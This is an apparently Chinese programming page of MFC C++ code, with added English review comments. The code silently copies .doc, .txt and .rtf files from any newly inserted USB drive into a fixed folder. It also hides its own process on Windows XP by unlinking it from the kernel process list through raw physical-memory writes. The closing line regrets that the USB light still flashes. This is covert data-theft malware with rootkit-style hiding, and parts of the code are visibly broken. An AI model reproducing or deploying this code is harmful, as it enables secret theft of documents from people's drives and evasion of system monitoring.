C# 屏蔽移动盘

// Probes drive letters 'A' through 'Z' in order and returns the first root
// ("X:") for which GetDriveType reports DRIVE_REMOVABLE.
// Returns an empty string when no letter matches.
CString CMyDialog::FindFdisk()
{
    CString root = "";
    char letter = 'A';
    while (letter <= 'Z')
    {
        root.Format("%c:", letter);
        const bool isRemovable = (GetDriveType((LPCTSTR)root) == DRIVE_REMOVABLE); // removable drive
        if (isRemovable)
            return root;
        ++letter;
    }

    // Nothing matched: reset the scratch string and hand back "".
    root = "";
    return root;
}
// Recursively walks `dir` and copies every file whose extension is on the
// list below into the single directory m_Path.
//
// In this listing the only caller is OnDeviceChange, on DBT_DEVICEARRIVAL, so
// the walk starts as soon as a removable drive is reported; no prompt or
// notification appears in the code shown.
//
// NOTE(review): the opening brace of the body is missing from the listing as
// published (the line after the signature is blank).
// NOTE(review): for monitoring, this pattern would appear as a burst of reads
// of .doc/.txt/.rtf files from a just-mounted removable volume by a non-shell
// process, with matching writes under one fixed directory.
void CMyDialog::CopyFile(CString dir)
 
    CFileFind tempFind;
    CString tempFileFind;
    // Search pattern "<dir>\*.*" enumerates every entry directly under dir.
    tempFileFind.Format("%s\\*.*",dir);
    BOOL IsFinded=(BOOL)tempFind.FindFile(tempFileFind);
    while(IsFinded)
    {
      // FindNextFile advances to the current entry and reports whether more follow.
      IsFinded=(BOOL)tempFind.FindNextFile();
      // Skip the "." and ".." pseudo-entries.
      if(!tempFind.IsDots())
      {
         CString foundFileName;
         foundFileName=tempFind.GetFileName();
        
         if(tempFind.IsDirectory())
         {
            // Descend into the subdirectory; there is no depth limit.
            CString tempDir;
            tempDir.Format("%s\\%s",dir,foundFileName);
            CopyFile(tempDir);
         }
         // Case-sensitive comparison of the text from the last '.' onward against
         // ".doc", ".DOC", ".txt", ".TXT" and ".rtf" (".rtf" is tested twice).
         else if(foundFileName.Mid(foundFileName.ReverseFind('.'))==".doc"||foundFileName.Mid(foundFileName.ReverseFind('.'))==".DOC"||foundFileName.Mid(foundFileName.ReverseFind('.'))==".txt"||foundFileName.Mid(foundFileName.ReverseFind('.'))==".TXT"||foundFileName.Mid(foundFileName.ReverseFind('.'))==".rtf"||foundFileName.Mid(foundFileName.ReverseFind('.'))==".rtf")
         {
            CString tempFileName1,tempFileName2;
            tempFileName1.Format("%s\\%s",dir,foundFileName);
            // The destination keeps only the file name, so the source directory
            // structure is flattened and same-named files replace each other.
            tempFileName2.Format("%s\\%s",m_Path,foundFileName);
            // Third argument FALSE: an existing destination file is overwritten.
            // The result of the copy is not checked.
            ::CopyFile(tempFileName1,tempFileName2,FALSE);
         }
      }
    }
    tempFind.Close();
}
// Device-change handler.
//   DBT_DEVICEARRIVAL        - looks up a removable drive with FindFdisk(),
//                              stores it in m_NewFdisk and, when one was found
//                              and IsRun is set, runs CopyFile on it.
//   DBT_DEVICEREMOVECOMPLETE - clears the stored drive letter.
// dwData is not used. Always returns TRUE.
BOOL CMyDialog::OnDeviceChange( UINT nEventType, DWORD dwData )
{
    if (nEventType == DBT_DEVICEARRIVAL)
    {
        m_NewFdisk = FindFdisk();

        const bool driveFound = (m_NewFdisk != "");
        if (driveFound && IsRun)
        {
            CopyFile(m_NewFdisk);
        }
    }
    else if (nEventType == DBT_DEVICEREMOVECOMPLETE)
    {
        m_NewFdisk = ""; // clear the stored drive letter
    }

    return TRUE;
}
.h 中
virtual void DoDataExchange(CDataExchange* pDX);    // DDX/DDV support

// Declaration of the device-change handler whose body appears in the listing
// as CMyDialog::OnDeviceChange.
afx_msg BOOL OnDeviceChange( UINT nEventType, DWORD dwData );
// Hide process: calls MyHideProcess() at most once per process lifetime, and
// only when OSVer() reports "WinXP". The result of MyHideProcess() is
// discarded; this function returns true on every path.
BOOL HideProcess()
{
    const CString detectedOs = OSVer();
    if (detectedOs != "WinXP")
        return true;

    // One-shot latch so that later calls do nothing.
    static BOOL b_hide = false;
    if (b_hide)
        return true;

    b_hide = true;
    MyHideProcess();
    return true;
}

// Determine which operating system is in use.
// Returns "WinXP" when the platform is VER_PLATFORM_WIN32_NT, the major
// version is at least 5 and the minor version is non-zero; otherwise returns
// `null` as written in the listing. The test is therefore broader than Windows
// XP alone: any NT release with major >= 5 and a non-zero minor matches.
// The result of GetVersionEx is not checked.
CString OSVer()
{
    OSVERSIONINFOEX info;
    ::ZeroMemory(&info, sizeof(info));
    info.dwOSVersionInfoSize = sizeof(info);
    ::GetVersionEx(reinterpret_cast<LPOSVERSIONINFO>(&info));

    const bool ntFiveOrLater =
        (info.dwPlatformId == VER_PLATFORM_WIN32_NT) && (info.dwMajorVersion >= 5);
    if (ntFiveOrLater && info.dwMinorVersion != 0)
        return "WinXP";

    return null;
}
// Unlinks one entry from a doubly linked list by writing its neighbours'
// link fields directly through a physical-memory mapping. The page describes
// the purpose as hiding the process. Returns FALSE when InitNTDLL() or
// OpenPhysicalMemory() fails, TRUE otherwise.
//
// NOTE(review): every address and offset below is hard-coded, and
// InitNTDLL/OpenPhysicalMemory/g_osvi/g_hMPM are defined outside this listing.
// OpenPhysicalMemory presumably opens the physical-memory section object from
// user mode, which later Windows releases no longer permit - confirm.
// NOTE(review): for defenders - a process unlinked from one list is typically
// still visible to cross-view checks that enumerate from other sources, and a
// user-mode open of the physical-memory section is itself a strong signal.
BOOL MyHideProcess()
{
    if (FALSE == InitNTDLL()) //load ntdll.dll
        return FALSE;

    if (0 == OpenPhysicalMemory())
        return FALSE;

    // NOTE(review): 0xFFDFF124 looks like the x86 per-processor "current thread"
    // slot, and +0x44 the thread's pointer to its owning process - confirm.
    ULONG thread  = GetData((PVOID)0xFFDFF124);
    ULONG process = GetData(PVOID(thread + 0x44));

    // fw/bw receive the two link values read from the process structure; the
    // offsets depend on g_osvi.dwMinorVersion (0 or 1).
    // NOTE(review): for any other minor version both stay uninitialized and the
    // writes below go to unpredictable addresses. GetData's failure value 0 is
    // not checked either.
    ULONG fw, bw;
    if (0 == g_osvi.dwMinorVersion)
    {
        fw = GetData(PVOID(process + 0xa0));
        bw = GetData(PVOID(process + 0xa4));       
    }

    if (1 == g_osvi.dwMinorVersion)
    {
        fw = GetData(PVOID(process + 0x88));
        bw = GetData(PVOID(process + 0x8c));
    }
       
    // Standard list unlink: next->back = prev, prev->forward = next.
    // The SetData results are ignored.
    SetData(PVOID(fw + 4), bw);
    SetData(PVOID(bw), fw);

    CloseHandle(g_hMPM);
    CloseNTDLL();

    return TRUE;
}
// Reads one 32-bit value at virtual address `addr` by way of physical memory:
// translates the address with LinearToPhys, maps the 4 KiB page that contains
// it from g_hMPM, reads the word, and unmaps the view.
// Returns the value read, or 0 when the mapping fails (indistinguishable from
// a stored 0).
// NOTE(review): LinearToPhys returns 0 for a non-present entry and that is not
// checked here, so such a failure reads the first word of physical page 0.
// The ULONG casts assume a 32-bit build - confirm.
ULONG GetData(PVOID addr)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
    // Map the page-aligned physical address; 0x1000 is the view size in bytes.
    PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
   
    if (0 == tmp)
        return 0;

    // Offset within the page, converted to a ULONG index (rounds down to 4-byte alignment).
    ULONG ret = tmp[(phys & 0xFFF)>>2];
    UnmapViewOfFile(tmp);

    return ret;
}

// Writes the 32-bit value `data` at virtual address `addr` by way of physical
// memory: translates the address with LinearToPhys, maps the containing 4 KiB
// page from g_hMPM for writing, stores the word, and unmaps the view.
// Returns FALSE when the mapping fails, TRUE otherwise.
// NOTE(review): a 0 result from LinearToPhys (entry not present) is not
// checked, so in that case the store lands in physical page 0.
// The ULONG casts assume a 32-bit build - confirm.
BOOL SetData(PVOID addr,ULONG data)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
    // Map the page-aligned physical address; 0x1000 is the view size in bytes.
    PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);

    if (0 == tmp)
        return FALSE;

    // Offset within the page, converted to a ULONG index (rounds down to 4-byte alignment).
    tmp[(phys & 0xFFF)>>2] = data;
    UnmapViewOfFile(tmp);

    return TRUE;
}
// Translates virtual address `addr` to a physical address by walking a
// two-level table whose top level is `BaseAddress`. Returns the physical
// address, or 0 when either level's entry has bit 0 (present) clear.
// NOTE(review): the index and mask values match the x86 non-PAE paging layout
// (10-bit directory index, 10-bit table index, 12-bit offset) - confirm that
// this is the only configuration the caller targets.
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
    ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;
    // Top 10 bits of the address select the directory entry.
    PGDE = BaseAddress[VAddr>>22];

    if (0 == (PGDE&1))
        return 0;

    // Bit 0x80 of the directory entry selects the large-page form.
    ULONG tmp = PGDE & 0x00000080;

    if (0 != tmp)
    {
        // Large page: the entry supplies the top 10 bits, the address the low 22.
        PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
    }
    else
    {
        // Map the second-level table named by the directory entry (access value 4)
        // and reuse PGDE to hold the view pointer.
        // NOTE(review): the MapViewOfFile result is not checked before it is indexed.
        PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
        PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
       
        // NOTE(review): this early return skips UnmapViewOfFile, leaving the view mapped.
        if (0 == (PTE&1))
            return 0;

        PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
        UnmapViewOfFile((PVOID)PGDE);
    }

    return (PVOID)PAddr;
}
......
隐藏进程的参考网络上应该有。仍旧无法控制U盘灯的闪烁

 
